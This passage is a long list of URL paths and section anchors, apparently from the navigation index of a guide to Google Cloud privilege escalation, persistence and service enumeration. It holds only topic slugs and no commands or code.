-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#gcp---deploymentmaneger-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#deploymentmanagerdeploymentssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#gcp---iam-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iam","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamrolesupdate-iamrolesget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetaccesstoken-iamserviceaccountsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountkeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsimplicitdelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignblob","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssignjwt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#iamserviceaccountsgetopenidtoken","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#gcp---kms-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#kms","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecrypt","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.html#cloudkmscryptokeyversionsusetodecryptviadelegation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#gcp---orgpolicy-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#orgpolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#orgpolicypolicyset","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-orgpolicy-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#gcp---pubsub-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsub","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsnapshotscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsnapshotssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionsupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionsconsume","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-pubsub-privesc.html#pubsubsubscriptionssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#gcp---resourcemanager-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerorganizationssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerfolderssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-resourcemanager-privesc.html#resourcemanagerprojectssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#gcp---run-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#cloud-run","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicescreate--iamserviceaccountsactas--runroutesinvoke","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicesupdate--iamserviceaccountsactas","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runservicessetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobscreate-runjobsrun-iamserviceaccountsactasrunjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobsupdaterunjobsruniamserviceaccountsactasrunjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#runjobsrun-runjobsrunwithoverrides-runjobsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-run-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#gcp---secretmanager-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanager","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanagerversionsaccess","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-secretmanager-privesc.html#secretmanagersecretssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#gcp---serviceusage-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusage","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageapikeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageapikeyslist","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#serviceusageservicesenable----serviceusageservicesuse","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-serviceusage-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#gcp---sourcerepos-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#source-repositories","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposupdate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcerepossetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#secret-access","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#add-ssh-keys","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#manual-credentials","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-sourcerepos-privesc.html#sourcereposupdateprojectconfig","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#gcp---storage-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storage","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storagebucketssetiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storagehmackeyscreate","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#storageobjectscreate-storageobjectsdelete--storage-write-permissions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#composer","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#cloud-functions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#app-engine","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#gcr","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-storage-privesc.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#gcp---workflows-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflows","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflowsworkflowscreate-iamserviceaccountsactas-workflowsexecutionscreate-workflowsworkflowsget-workflowsoperationsget","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#leak-oidc-token-and-oauth","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-workflows-privesc.html#workflowsworkflowsupdate-","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#gcp---generic-permissions-privesc","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#generic-interesting-permissions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#setiampolicy","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#create-update","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-misc-perms-privesc.html#serviceaccount","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#gcp---network-docker-escape","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#initial-state","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#attack-explanation","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#escape-technique","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-network-docker-escape.html#references","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#gcp---local-privilege-escalation-ssh-pivoting","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#read-the-scripts","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#custom-metadata","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#abusing-iam-permissions","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#search-for-keys-in-the-filesystem","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#more-api-keys-regexes","pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.html#references","pentesting-cloud/gcp-security/gcp-persistence/index.html#gcp---persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#gcp---api-keys-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#api-keys","pentesting-cloud/gcp-security/gcp-persistence/gcp-api-keys-persistence.html#create-new--access-existing-ones","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#gcp---app-engine-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#app-engine","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#modify-code","pentesting-cloud/gcp-security/gcp-persistence/gcp-app-engine-persistence.html#old-version-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#gcp---artifact-registry-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#artifact-registry","pentesting-cloud/gcp-security/gcp-persistence/gcp-artifact-registry-persistence.html#dependency-confusion","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#gcp---bigquery-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#bigquery","pentesting-cloud/gcp-security/gcp-persistence/gcp-bigquery-persistence.html#grant-further-access","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#gcp---cloud-functions-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#cloud-functions","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-functions-persistence.html#persistence-techniques","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#gcp---cloud-run-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#cloud-run","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#backdoored-revision","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#publicly-accessible-service","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-run-persistence.html#backdoored-service-or-job","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#gcp---cloud-shell-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#cloud-shell","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#persistent-backdoor","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-shell-persistence.html#references","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#gcp---cloud-sql-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#cloud-sql","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#expose-the-database-and-whitelist-your-ip-address","pentesting-cloud/gcp-security/gcp-persistence/gcp-cloud-sql-persistence.html#create-a-new-user--update-users-password--get-password-of-a-user","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#gcp---compute-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#compute","pentesting-cloud/gcp-security/gcp-persistence/gcp-compute-persistence.html#persistence-abusing-instances--backups","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#gcp---dataflow-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#dataflow","pentesting-cloud/gcp-security/gcp-persistence/gcp-dataflow-persistence.html#invisible-persistence-in-built-container","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#gcp---filestore-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#filestore","pentesting-cloud/gcp-security/gcp-persistence/gcp-filestore-persistence.html#give-broader-access-and-privileges-over-a-mount","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#gcp---logging-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#logging","pentesting-cloud/gcp-security/gcp-persistence/gcp-logging-persistence.html#loggingsinkscreate","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#gcp---secret-manager-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#secret-manager","pentesting-cloud/gcp-security/gcp-persistence/gcp-secret-manager-persistence.html#rotation-misuse","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#gcp---storage-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#storage","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#storagehmackeyscreate","pentesting-cloud/gcp-security/gcp-persistence/gcp-storage-persistence.html#give-public-access","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#gcp---token-persistence","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#authenticated-user-tokens","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#auth-flow","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#oauth-scopes","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#service-accounts","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#metadata","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#remediations","pentesting-cloud/gcp-security/gcp-persistence/gcp-non-svc-persistence.html#references","pentesting-cloud/gcp-security/gcp-services/index.html#gcp---services","pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.html#gcp---ai-platform-enum","pentesting-cloud/gcp-security/gcp-services/gcp-ai-platform-enum.html#ai-platform","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#gcp---api-keys-enum","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#restrictions","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-api-keys-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#gcp---app-engine-enum","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#firewall","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#sa","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#containers","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#urls--regions","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-app-engine-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#gcp---artifact-registry-enum","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#formats-and-modes","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#cleanup-policies","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#vulnerability-scanning","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#unauthenticated-access","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-artifact-registry-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#gcp---batch-enum","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#service-account","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-batch-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#gcp---bigquery-enum","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#expiration","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#external-sources","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#dataset-acls","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#table-rows-control-access","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#columns-access-control","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#bigquery-sql-injection","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#privilege-escalation--post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-bigquery-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.html#gcp---bigtable-enum","pentesting-cloud/gcp-security/gcp-services/gcp-bigtable-enum.html#bigtable","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#gcp---cloud-build-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#events","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#execution","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#sa-permissions","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#approvals","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#pr-approvals","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#connections--repositories","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#connect-a-repository","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#get-shell","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#unauthenticated-access","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#gcp---cloud-functions-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#cloud-functions","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#storage","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#artifact-registry","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#sa","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#triggers-url--authentication","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#inside-the-cloud-function","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#unauthenticated-access","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#gcp---cloud-run-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#services-and-jobs","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run-service","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#relevant-details","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#cloud-run-jobs","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#unauthenticated-access","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#gcp---cloud-shell-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#gcp---cloud-sql-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#password","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#zone-availability","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#connections","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#data-protection","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#gcp---cloud-scheduler-enum","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#service-accounts","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#gcp---compute-enum","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#gcp-vpc--networking","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#compute-instances","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration-1","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#privilege-escalation","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#unauthenticated-enum","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#post-exploitation","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#persistence","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#serial-console-logs","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#startup-scripts-output","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#os-configuration-manager","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration-2","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#images","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#custom-images","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#custom-instance-templates","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#snapshots","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#enumeration-3","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#privilege-escalation-1","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/index.html#references","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#gcp---compute-instances","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#basic-information","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#confidential-vm","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#disk--disk-encryption","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#deploy-container","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#service-account","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#firewall","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#networking","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#extra-security","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#vm-access","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#metadata","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.html#encryption","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#gcp---vpc--networking","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#gcp-compute-networking-in-a-nutshell","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.html#vpc-subnetworks--firewalls-in-gcp","pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc